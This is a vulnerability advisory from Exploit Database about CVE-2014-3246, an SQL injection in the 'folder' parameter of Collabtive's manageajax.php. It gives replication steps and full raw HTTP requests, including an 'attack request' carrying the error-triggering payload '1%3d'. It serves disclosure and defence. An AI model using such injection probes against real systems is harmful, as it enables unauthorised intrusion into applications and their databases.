Collabtive 1.2 – SQL Injection

• Exploit Database
• 109 阅读

• 作者： Deepak Rathore
  日期： 2014-05-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33249/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82

  Vulnerability title: SQL Injection / SQL Error message in Collabtive application (CVE-2014-3246) CVE: CVE-2014-3246 (cordinated with Vendor: Collabtive Product: Collabtive (Open Source Project Management Software) Affected version: 1.12 Fixed version: 2.0 Reported by: Deepak Rathore Severity: Critical URL: http://[domain]/collabtive-12/managefile.php?action=showproject&id=2482 Affected Users: Authenticated users Affected parameter(s): folder   Issue details: The folder parameter appears to be vulnerable to SQL injection attacks. The payload 1%3d was submitted in the folder parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.   HTTP request: GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1 Host: collabtive.o-dyn.de User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.0.3 Referer: http://xxx/managefile.php?action=showproject&id=2482 Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be; PHPSESSID=ba83d29aab270a7926ea1be2e1f830be Connection: keep-alive   Steps to replicate: 1. Login into application 2. Go to "Desktop" tab and click on "Add project" 3. Fill the project details in the project form and click on "Add" button 4. After creating a project go to "Files" tab and Intercept the request 5. At "manageajax.php" file, replace "folder" parameter value with "1%3d" ===================== Original Request ===================== GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1 Host: collabtive.o-dyn.de User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.0.3 Referer: http://xxx/managefile.php?action=showproject&id=2482 Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be; PHPSESSID=ba83d29aab270a7926ea1be2e1f830be Connection: keep-alive ====================== Attack Request ====================== GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1 Host: collabtive.o-dyn.de User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.0.3 Referer: http://xxx/managefile.php?action=showproject&id=2482 Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be; PHPSESSID=ba83d29aab270a7926ea1be2e1f830be Connection: keep-alive ====================== 6. Forward manipulated request to server and wait for response in browser 7. SQL Error message is the proof of vulnerability.   Tools used: Burp Suite proxy, Mozilla Firefox browser